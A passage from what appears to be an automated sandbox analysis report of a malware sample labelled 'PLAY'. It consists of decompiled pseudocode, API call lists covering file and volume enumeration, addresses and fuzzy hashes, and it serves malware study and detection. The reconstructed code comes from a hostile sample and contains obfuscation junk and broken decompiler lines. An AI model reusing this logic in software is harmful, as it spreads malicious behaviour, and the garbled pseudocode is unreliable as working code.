									__edx =  *(__ebp - 0x1224);
									__ecx =  *(__ebp - 0x123c);
									__edx =  *(__ebp - 0x1224) + __esi;
									_push( *((intOrPtr*)(__edx + 4)));
									__ecx =  *(__ebp +  *(__ebp - 0x123c) * 4 - 0x1218);
									__eax = __edx + 0x10c;
									E00AE2820(__ebx,  *(__ebp +  *(__ebp - 0x123c) * 4 - 0x1218), __edx, __edi, __esi, __edx + 0x10c) = 1;
									__ebx =  ==  ? 1 : __ebx;
								}
								__eax =  *(__ebp - 0x1224);
								_push( *((intOrPtr*)(__esi + __eax + 4)));
								__edx = __eax + 8;
								__eax =  *(__ebp - 0x123c);
								__edx = __edx + __esi;
								__ecx =  *(__ebp +  *(__ebp - 0x123c) * 4 - 0x1218);
								__eax = E00AE2A20(__ebx,  *(__ebp +  *(__ebp - 0x123c) * 4 - 0x1218), __edx, __edi, __esi);
								__esp = __esp + 4;
							}
							__edi = __edi + 1;
							__esi = __esi + 0x210;
						} while (__edi <  *((intOrPtr*)(__ebp - 0x122c)));
					}
				}
				__ecx =  *(__ebp - 0x123c);
				__eax =  *(__ebp - 0x121c);
				__ecx =  *(__ebp - 0x123c) + 1;
				__eax =  *(__ebp - 0x121c) >> 2;
				 *(__ebp - 0x123c) = __ecx;
				if(__ecx < __eax) {
					_t44 =  *((intOrPtr*)(_t56 + _t47 * 4 - 0x1218));
					 *((intOrPtr*)(_t56 - 0x1244)) = _t44;
					_t58 = _t57 - 0xc;
					if(0x6dad == 0x7335) {
						_t58 = _t58 + 0xf6;
					}
					L5();
					_t61 = _t58 + 0xc - 1;
					asm("outsb");
					 *0x5977FA26 =  *((intOrPtr*)(0x5977fa26)) + 0x266c6bec;
					asm("invalid");
					asm("clc");
					asm("adc al, 0x2e");
					 *_t61 =  *_t61 + 0x31;
					return _t44;
				} else {
					__esp = __esp - 0x10;
					if(0x79 <= 0x24) {
						__esp = __esp + 0x184;
					}
					__esp = __esp + 0x10;
					L19();
					__edi = __edi - 1;
					if(__edi < 0) {
						 *__eax =  *__eax + __al;
						__eax = FindCloseChangeNotification( *(__ebp - 0x1240)); // executed
						__ecx =  *(__ebp - 0x1248);
						__eax = __ebp - 0x1220;
						__edx = 0x2bf20;
						 *(__ebp - 0x1220) = 0;
						__eax = E00AEE9B0(__eax, __ebx,  *(__ebp - 0x1248), 0x2bf20, __edi, __esi); // executed
						__ecx =  *(__ebp - 0x1230);
						__esp = __esp + 4; // executed
						__eax = E00AEE110(__ebx,  *(__ebp - 0x1230), __edi, __esi); // executed
						__ecx =  *(__ebp - 0x1224);
						__eax = E00AEE110(__ebx,  *(__ebp - 0x1224), __edi, __esi); // executed
						__ecx =  *(__ebp - 4);
						__esp = __esp + 4;
						__ecx =  *(__ebp - 4) ^ __ebp;
						__eax = 1;
						__edi = 0x20;
						__esi = __eax;
						_pop(__ebx);
						__eax = E00AF7B30( *(__ebp - 4) ^ __ebp);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					} else {
						 *__esp =  *__esp + 0x14;
						return __eax;
					}
				}
				L6:
				asm("lds ecx, [0x3cfb72ab]");
			}









          0x00ae1929
          0x00ae192b
          0x00ae192b
          0x00ae1936
          0x00ae1937
          0x00ae193d
          0x00ae1942
          0x00ae194c
          0x00ae195f
          0x00ae1963
          0x00ae1969
          0x00ae196b
          0x00ae1973
          0x00ae1979
          0x00ae1980
          0x00ae1980
          0x00ae1986
          0x00ae198c
          0x00ae1993
          0x00ae1997
          0x00ae1999
          0x00ae199f
          0x00ae19a5
          0x00ae19a7
          0x00ae19aa
          0x00ae19b1
          0x00ae19c6
          0x00ae19cb
          0x00ae19cb
          0x00ae19ce
          0x00ae19d4
          0x00ae19d8
          0x00ae19db
          0x00ae19e1
          0x00ae19e3
          0x00ae19ea
          0x00ae19ef
          0x00ae19ef
          0x00ae19f2
          0x00ae19f3
          0x00ae19f9
          0x00ae1980
          0x00ae1973
          0x00ae1a05
          0x00ae1a0b
          0x00ae1a11
          0x00ae1a12
          0x00ae1a15
          0x00ae1a1d
          0x00ae18e0
          0x00ae18e7
          0x00ae18ed
          0x00ae18fb
          0x00ae18fd
          0x00ae18fd
          0x00ae1906
          0x00ae190d
          0x00ae190f
          0x00ae1912
          0x00ae191f
          0x00ae1920
          0x00ae1921
          0x00ae1923
          0x00ae1927
          0x00ae1a23
          0x00ae1a23
          0x00ae1a2c
          0x00ae1a2e
          0x00ae1a2e
          0x00ae1a34
          0x00ae1a37
          0x00ae1a3c
          0x00ae1a3d
          0x00ae1a59
          0x00ae1a61
          0x00ae1a63
          0x00ae1a69
          0x00ae1a72
          0x00ae1a77
          0x00ae1a81
          0x00ae1a86
          0x00ae1a8c
          0x00ae1a8f
          0x00ae1a94
          0x00ae1a9a
          0x00ae1a9f
          0x00ae1aa2
          0x00ae1aa5
          0x00ae1aa7
          0x00ae1aac
          0x00ae1aad
          0x00ae1aae
          0x00ae1aaf
          0x00ae1ab4
          0x00ae1ab6
          0x00ae1ab7
          0x00ae1a3f
          0x00ae1a3f
          0x00ae1a43
          0x00ae1a43
          0x00ae1a3d
          0x00ae192f
          0x00ae192f

          APIs
          • K32GetModuleFileNameExA.KERNEL32(?,?,?,00000104), ref: 00AE195F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileModuleName
          • String ID: kl&
          • API String ID: 514040917-1956152545
          • Opcode ID: 8314908edcb672d060a801b060d8bc6b8a7342af5ba82e5bdcdf8d6bb9dc014b
          • Instruction ID: 3d9a3b470b7764b2eebc333eb7c7eee03c30aca1ff759fa581561e9e4489826e
          • Opcode Fuzzy Hash: 8314908edcb672d060a801b060d8bc6b8a7342af5ba82e5bdcdf8d6bb9dc014b
          • Instruction Fuzzy Hash: F831F471D001AA9BCF20AF65DC916EDB3B1FB64344F0442B9D40997251EA319EE5CF82
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE25B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON
          Download Yara Rule
          APIs
          • K32GetModuleFileNameExA.KERNEL32(?,?,?,00000104), ref: 00AE25EA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FileModuleName
          • String ID: kl&
          • API String ID: 514040917-1956152545
          • Opcode ID: 1c9dd3a8e121351aecfcf35a8e64cf59dbca1595a4eb2d0ec9e804a0fa6b484b
          • Instruction ID: 4a1b69dba7c25e88a0a7bc99b8372dfa3512fb2e41f11f1caa6143dc0dc93e1f
          • Opcode Fuzzy Hash: 1c9dd3a8e121351aecfcf35a8e64cf59dbca1595a4eb2d0ec9e804a0fa6b484b
          • Instruction Fuzzy Hash: 9F212671D001599BCF24AF25DD526EDF3B5EF54300F1442E9D509D6200EB368EA4CF81
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE187A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80COMMON
          Download Yara Rule
          C-Code - Quality: 51%
          			E00AE187A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				signed int _t28;
				intOrPtr _t31;
				void* _t54;
				signed int _t58;
				intOrPtr* _t60;
				void* _t64;
				void* _t65;
				void* _t66;
				intOrPtr* _t69;

				_t56 = __esi;
				_t54 = __edi;
				_t32 = __ebx;
				if(E00AEE6E0(__ebx, _t58 - 0x110, __edx, __edi) == 0) {
					L15:
					_push(_t58 - 0x1220);
					 *((intOrPtr*)(_t58 - 0x1220)) = 0;
					E00AEE9B0(_t58 - 0x1220, _t32,  *((intOrPtr*)(_t58 - 0x1248)), 0x2bf20, _t54, _t56); // executed
					E00AEE110(_t32,  *((intOrPtr*)(_t58 - 0x1230)), _t54, _t56); // executed
					E00AEE110(_t32,  *((intOrPtr*)(_t58 - 0x1224)), _t54, _t56); // executed
					return E00AF7B30( *(_t58 - 4) ^ _t58, 0x20);
				} else {
					_t27 = L00AEE660(_t32, __edi, __esi);
					 *(_t58 - 0x1240) = _t27;
					if(_t27 == 0) {
						goto L15;
					} else {
						_t28 = E00AEEA50(_t32, _t27, _t58 - 0x1218, __edi, __esi, _t58 - 0x121c, _t58 - 0x121c); // executed
						_t64 = _t60 + 8;
						if(_t28 == 0) {
							L10:
							_t65 = _t64 - 0x10;
							if(0x79 <= 0x24) {
								_t65 = _t65 + 0x184;
							}
							_t60 = _t65 + 0x10;
							L13();
							if(_t54 < 0) {
								 *_t28 =  *_t28 + _t28;
								FindCloseChangeNotification( *(_t58 - 0x1240)); // executed
								goto L15;
							} else {
								 *_t60 =  *_t60 + 0x14;
								return _t28;
							}
						} else {
							_t28 =  *(_t58 - 0x121c) & 0xfffffffc;
							 *((intOrPtr*)(_t58 - 0x123c)) = 1;
							if(_t28 <= 4) {
								goto L10;
							} else {
								_t31 =  *((intOrPtr*)(_t58 + 0xffffffffffffedec));
								 *((intOrPtr*)(_t58 - 0x1244)) = _t31;
								_t66 = _t64 - 0xc;
								if(0x6dad == 0x7335) {
									_t66 = _t66 + 0xf6;
								}
								L9();
								_t69 = _t66 + 0xc - 1;
								asm("outsb");
								 *0x5977FA26 =  *((intOrPtr*)(0x5977fa26)) + 0x266c6bec;
								asm("invalid");
								asm("clc");
								asm("adc al, 0x2e");
								 *_t69 =  *_t69 + 0x31;
								return _t31;
							}
						}
					}
				}
			}













          0x00ae187a
          0x00ae187a
          0x00ae187a
          0x00ae1887
          0x00ae1a63
          0x00ae1a6f
          0x00ae1a77
          0x00ae1a81
          0x00ae1a8f
          0x00ae1a9a
          0x00ae1ab7
          0x00ae188d
          0x00ae188d
          0x00ae1892
          0x00ae189a
          0x00000000
          0x00ae18a0
          0x00ae18b0
          0x00ae18b5
          0x00ae18ba
          0x00ae1a23
          0x00ae1a23
          0x00ae1a2c
          0x00ae1a2e
          0x00ae1a2e
          0x00ae1a34
          0x00ae1a37
          0x00ae1a3d
          0x00ae1a59
          0x00ae1a61
          0x00000000
          0x00ae1a3f
          0x00ae1a3f
          0x00ae1a43
          0x00ae1a43
          0x00ae18c0
          0x00ae18cb
          0x00ae18ce
          0x00ae18d7
          0x00000000
          0x00ae18e0
          0x00ae18e0
          0x00ae18e7
          0x00ae18ed
          0x00ae18fb
          0x00ae18fd
          0x00ae18fd
          0x00ae1906
          0x00ae190d
          0x00ae190f
          0x00ae1912
          0x00ae191f
          0x00ae1920
          0x00ae1921
          0x00ae1923
          0x00ae1927
          0x00ae1927
          0x00ae18d7
          0x00ae18ba
          0x00ae189a

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: kl&
          • API String ID: 0-1956152545
          • Opcode ID: 1d556960b028bd9935153b686b43887b44735b047ee55225b8e4d60ad21528d1
          • Instruction ID: 7337cc9f845c13278b76cb1c7bfa9c472545ed5fe07156824e3bb585e694b57e
          • Opcode Fuzzy Hash: 1d556960b028bd9935153b686b43887b44735b047ee55225b8e4d60ad21528d1
          • Instruction Fuzzy Hash: 2221E071E101694BDB20FB65ED527EDB360EF60344F0406F9E809C7281EA369EA48FD2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE1BFB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39fileCOMMON
          Download Yara Rule
          APIs
          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,000000E6), ref: 00AE1C54
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: CreateFile
          • String ID: UhN
          • API String ID: 823142352-3302117450
          • Opcode ID: 8e7d7188dca065090b6b45dd50c39c81db2c7942a281b47acc088ebe9831f974
          • Instruction ID: 5490b706d299cbf3cb4ec47d793c3eea4b1e86ba1965bfb238331ce7f87cb8f2
          • Opcode Fuzzy Hash: 8e7d7188dca065090b6b45dd50c39c81db2c7942a281b47acc088ebe9831f974
          • Instruction Fuzzy Hash: 8EF0F431658198BAC724C6B86C55BEA7B50EF89320F10078DF22AAB1D1CB6166548740
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFCF1E Relevance: 3.2, APIs: 2, Instructions: 166COMMON
          Download Yara Rule
          C-Code - Quality: 91%
          			E00AFCF1E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t51;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t76;
				signed char* _t77;
				int _t80;
				signed int _t85;
				signed char* _t86;
				short* _t87;
				signed int _t88;
				signed char _t89;
				signed int _t90;
				signed int _t92;
				signed int _t93;
				short _t95;
				signed int _t96;
				intOrPtr _t99;
				signed int _t100;

				_t51 =  *0xb0b004; // 0x700d25f7
				_v8 = _t51 ^ _t100;
				_t99 = _a8;
				_t80 = E00AFCAB3(__eflags, _a4);
				if(_t80 == 0) {
					L36:
					E00AFCB24(_t99);
					goto L37;
				} else {
					_t95 = 0;
					_t85 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0xb0b550)) != _t80) {
						_t85 = _t85 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t85;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t80 == 0xfde8 || IsValidCodePage(_t80 & 0x0000ffff) == 0) {
								L22:
							} else {
								if(_t80 != 0xfde9) {
									_t57 = GetCPInfo(_t80,  &_v28);
									__eflags = _t57;
									if(_t57 == 0) {
										__eflags =  *0xb0d108 - _t95; // 0x0
										if(__eflags != 0) {
											goto L36;
										} else {
											goto L22;
										}
									} else {
										_t14 = _t99 + 0x18; // 0xaffa79
										E00AF8BB0(_t95, _t14, _t95, 0x101);
										 *(_t99 + 4) = _t80;
										__eflags = _v28 - 2;
										 *((intOrPtr*)(_t99 + 0x21c)) = _t95;
										if(_v28 == 2) {
											__eflags = _v22;
											_t76 =  &_v22;
											if(_v22 != 0) {
												while(1) {
													_t89 = _t76[1];
													__eflags = _t89;
													if(_t89 == 0) {
														goto L18;
													}
													_t92 = _t89 & 0x000000ff;
													_t90 =  *_t76 & 0x000000ff;
													while(1) {
														__eflags = _t90 - _t92;
														if(_t90 > _t92) {
															break;
														}
														 *(_t99 + _t90 + 0x19) =  *(_t99 + _t90 + 0x19) | 0x00000004;
														_t90 = _t90 + 1;
														__eflags = _t90;
													}
													_t76 =  &(_t76[2]);
													__eflags =  *_t76;
													if( *_t76 != 0) {
														continue;
													}
													goto L18;
												}
											}
											L18:
											_t25 = _t99 + 0x1a; // 0xaffa7b
											_t77 = _t25;
											_t88 = 0xfe;
											do {
												 *_t77 =  *_t77 | 0x00000008;
												_t77 =  &(_t77[1]);
												_t88 = _t88 - 1;
												__eflags = _t88;
											} while (_t88 != 0);
											_t26 = _t99 + 4; // 0xc033a47d
											 *((intOrPtr*)(_t99 + 0x21c)) = E00AFCA75( *_t26);
											_t95 = 1;
										}
										goto L8;
									}
								} else {
									 *(_t99 + 4) = 0xfde9;
									 *((intOrPtr*)(_t99 + 0x21c)) = _t95;
									 *((intOrPtr*)(_t99 + 0x18)) = _t95;
									 *((short*)(_t99 + 0x1c)) = _t95;
									L8:
									 *((intOrPtr*)(_t99 + 8)) = _t95;
									_t12 = _t99 + 0xc; // 0xaffa6d
									_t96 = _t12;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L9:
									E00AFCB89(_t80, _t92, _t96, _t99, _t99); // executed
									L37:
								}
							}
						}
						goto L38;
					}
					_t28 = _t99 + 0x18; // 0xaffa79
					E00AF8BB0(_t95, _t28, _t95, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0xb0b560;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t86 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t86[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t93 =  *_t86 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t93 - _t67;
									if(_t93 > _t67) {
										break;
									}
									__eflags = _t93 - 0x100;
									if(_t93 < 0x100) {
										_t34 = _t95 + 0xb0b548; // 0x8040201
										 *(_t99 + _t93 + 0x19) =  *(_t99 + _t93 + 0x19) |  *_t34;
										_t93 = _t93 + 1;
										__eflags = _t93;
										_t67 = _t86[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t86 =  &(_t86[2]);
								__eflags =  *_t86;
								if( *_t86 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t95 = _t95 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t95 - 4;
					} while (_t95 < 4);
					 *(_t99 + 4) = _t80;
					 *((intOrPtr*)(_t99 + 8)) = 1;
					 *((intOrPtr*)(_t99 + 0x21c)) = E00AFCA75(_t80);
					_t46 = _t99 + 0xc; // 0xaffa6d
					_t87 = _t46;
					_t92 = _v36 + 0xb0b554;
					_t96 = 6;
					do {
						_t64 =  *_t92;
						_t92 = _t92 + 2;
						 *_t87 = _t64;
						_t49 = _t87 + 2; // 0x8babab84
						_t87 = _t49;
						_t96 = _t96 - 1;
						__eflags = _t96;
					} while (_t96 != 0);
					goto L9;
				}
				L38:
				return E00AF7B30(_v8 ^ _t100);
			}





























          0x00afcf26
          0x00afcf2d
          0x00afcf32
          0x00afcf3e
          0x00afcf43
          0x00afd0f9
          0x00afd0fa
          0x00000000
          0x00afcf49
          0x00afcf49
          0x00afcf4b
          0x00afcf4d
          0x00afcf4f
          0x00afcf52
          0x00afcf5e
          0x00afcf5f
          0x00afcf62
          0x00afcf6a
          0x00000000
          0x00afcf6c
          0x00afcf72
          0x00afd049
          0x00afcf8a
          0x00afcf91
          0x00afcfbe
          0x00afcfc4
          0x00afcfc6
          0x00afd03d
          0x00afd043
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00afcfc8
          0x00afcfcd
          0x00afcfd2
          0x00afcfda
          0x00afcfdd
          0x00afcfe1
          0x00afcfe7
          0x00afcfe9
          0x00afcfed
          0x00afcff0
          0x00afcff2
          0x00afcff2
          0x00afcff5
          0x00afcff7
          0x00000000
          0x00000000
          0x00afcff9
          0x00afcffc
          0x00afd007
          0x00afd007
          0x00afd009
          0x00000000
          0x00000000
          0x00afd001
          0x00afd006
          0x00afd006
          0x00afd006
          0x00afd00b
          0x00afd00e
          0x00afd011
          0x00000000
          0x00000000
          0x00000000
          0x00afd011
          0x00afcff2
          0x00afd013
          0x00afd013
          0x00afd013
          0x00afd016
          0x00afd01b
          0x00afd01b
          0x00afd01e
          0x00afd01f
          0x00afd01f
          0x00afd01f
          0x00afd024
          0x00afd02e
          0x00afd037
          0x00afd037
          0x00000000
          0x00afcfe7
          0x00afcf93
          0x00afcf93
          0x00afcf96
          0x00afcf9c
          0x00afcf9f
          0x00afcfa3
          0x00afcfa3
          0x00afcfa8
          0x00afcfa8
          0x00afcfab
          0x00afcfac
          0x00afcfad
          0x00afcfae
          0x00afcfaf
          0x00afd0ff
          0x00afd101
          0x00afcf91
          0x00afcf72
          0x00000000
          0x00afcf6a
          0x00afd056
          0x00afd05b
          0x00afd063
          0x00afd063
          0x00afd067
          0x00afd06a
          0x00afd070
          0x00afd073
          0x00afd073
          0x00afd076
          0x00afd078
          0x00afd07a
          0x00afd07a
          0x00afd07d
          0x00afd07f
          0x00000000
          0x00000000
          0x00afd081
          0x00afd084
          0x00afd0a0
          0x00afd0a0
          0x00afd0a2
          0x00000000
          0x00000000
          0x00afd089
          0x00afd08f
          0x00afd091
          0x00afd097
          0x00afd09b
          0x00afd09b
          0x00afd09c
          0x00000000
          0x00afd09c
          0x00000000
          0x00afd08f
          0x00afd0a4
          0x00afd0a7
          0x00afd0aa
          0x00000000
          0x00000000
          0x00000000
          0x00afd0aa
          0x00afd0ac
          0x00afd0ac
          0x00afd0af
          0x00afd0b0
          0x00afd0b3
          0x00afd0b6
          0x00afd0b6
          0x00afd0bc
          0x00afd0bf
          0x00afd0ce
          0x00afd0d7
          0x00afd0d7
          0x00afd0dc
          0x00afd0e2
          0x00afd0e3
          0x00afd0e3
          0x00afd0e6
          0x00afd0e9
          0x00afd0ec
          0x00afd0ec
          0x00afd0ef
          0x00afd0ef
          0x00afd0ef
          0x00000000
          0x00afd0f4
          0x00afd102
          0x00afd110

          APIs
            • Part of subcall function 00AFCAB3: GetOEMCP.KERNEL32(00000000,00AFCD25,00AFFA61,00000000,00000016,00000016,00000000,?,00AFFA61), ref: 00AFCADE
          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00AFCD6C,?,00000000,00AFFA61,558B0000,?,?,?,?,00000016), ref: 00AFCF7C
          • GetCPInfo.KERNEL32(00000000,00AFCD6C,?,?,00AFCD6C,?,00000000,00AFFA61,558B0000,?,?,?,?,00000016,00000000), ref: 00AFCFBE
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: CodeInfoPageValid
          • String ID:
          • API String ID: 546120528-0
          • Opcode ID: 85320dbc6e0d9d6563d8b8eb511b792a5d7bd3b2f7fe74df7c5305d8480880ad
          • Instruction ID: c3b1882a43eef21b56f23e801feb8493537e37c2c9e983d2b29e55bcd9997de9
          • Opcode Fuzzy Hash: 85320dbc6e0d9d6563d8b8eb511b792a5d7bd3b2f7fe74df7c5305d8480880ad
          • Instruction Fuzzy Hash: DD51257090030D9EDB22DFB6C9416BABBF6EF91310F14406EE28687251EB7599468B80
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AF3D00 Relevance: 3.2, APIs: 2, Instructions: 164fileCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: CreateFileIcmp6
          • String ID:
          • API String ID: 1957916104-0
          • Opcode ID: 040813390a15d52053621611de4be2f31865060acfc226d02f80995f9c987065
          • Instruction ID: f28ffc297658567d63305e17c13f43c5aff537ca6630a28b9e108cb262dc8374
          • Opcode Fuzzy Hash: 040813390a15d52053621611de4be2f31865060acfc226d02f80995f9c987065
          • Instruction Fuzzy Hash: 70518CB3D0018C6BDF00ABF4D9427FDBBB1DF65310F08426AFA55A7282E6315B488796
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEA472 Relevance: 3.1, APIs: 2, Instructions: 125COMMON
          Download Yara Rule
          APIs
          • FindFirstVolumeW.KERNELBASE(?,00000104), ref: 00AEA497
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: FindFirstVolume
          • String ID:
          • API String ID: 978207197-0
          • Opcode ID: f7e0def6d1e274d5cd7b46758751908659e67199c21ff8a617eb30f3fad4581f
          • Instruction ID: 586f0c68ecb7e51650b11c5de7a5e30ffc2e8d828a3b93739e44b8454c55c9d8
          • Opcode Fuzzy Hash: f7e0def6d1e274d5cd7b46758751908659e67199c21ff8a617eb30f3fad4581f
          • Instruction Fuzzy Hash: EA41E0769045C40ECB21FB79EC813E87B22DFB2310F4942D9D4554B287E5336A95CBA3
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFCD0A Relevance: 3.1, APIs: 2, Instructions: 100COMMON
          Download Yara Rule
          C-Code - Quality: 84%
          			E00AFCD0A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				char _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t39;
				signed int _t44;
				char _t48;
				char _t51;
				char _t58;
				signed int _t63;
				signed int _t64;
				void* _t76;
				void* _t81;
				signed int _t86;

				_t79 = __edx;
				_push(_a16);
				_push(_a12);
				E00AFCE23(__ecx, __edx, __eflags);
				_t39 = E00AFCAB3(__eflags, _a4);
				_v16 = _t39;
				_t69 =  *(_a12 + 0x48);
				if(_t39 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(_t63);
					_t81 = E00AFC308(_t69, 0x220);
					_t64 = _t63 | 0xffffffff;
					__eflags = _t81;
					if(__eflags == 0) {
						L5:
						_t86 = _t64;
					} else {
						_t81 = memcpy(_t81,  *(_a12 + 0x48), 0x88 << 2);
						 *_t81 =  *_t81 & 0x00000000; // executed
						_t44 = E00AFCF1E(_t64, _t79, _t81,  *(_a12 + 0x48), __eflags, _v16, _t81); // executed
						_t86 = _t44;
						__eflags = _t86 - _t64;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E00AFB26B();
							}
							asm("lock xadd [eax], ebx");
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								_t58 = _a12;
								__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0xb0b120;
								if( *((intOrPtr*)(_t58 + 0x48)) != 0xb0b120) {
									E00AFC2CE( *((intOrPtr*)(_t58 + 0x48)));
								}
							}
							 *_t81 = 1;
							_t76 = _t81;
							_t81 = 0;
							 *(_a12 + 0x48) = _t76;
							_t48 = _a12;
							__eflags =  *(_t48 + 0x350) & 0x00000002;
							if(( *(_t48 + 0x350) & 0x00000002) == 0) {
								__eflags =  *0xb0b698 & 0x00000001;
								if(__eflags == 0) {
									_v24 =  &_a12;
									_v20 =  &_a16;
									_t51 = 5;
									_v16 = _t51;
									_v12 = _t51;
									_push( &_v16);
									_push( &_v24);
									_push( &_v12);
									E00AFC9A5( &_v5, _t79, __eflags);
									__eflags = _a8;
									if(_a8 != 0) {
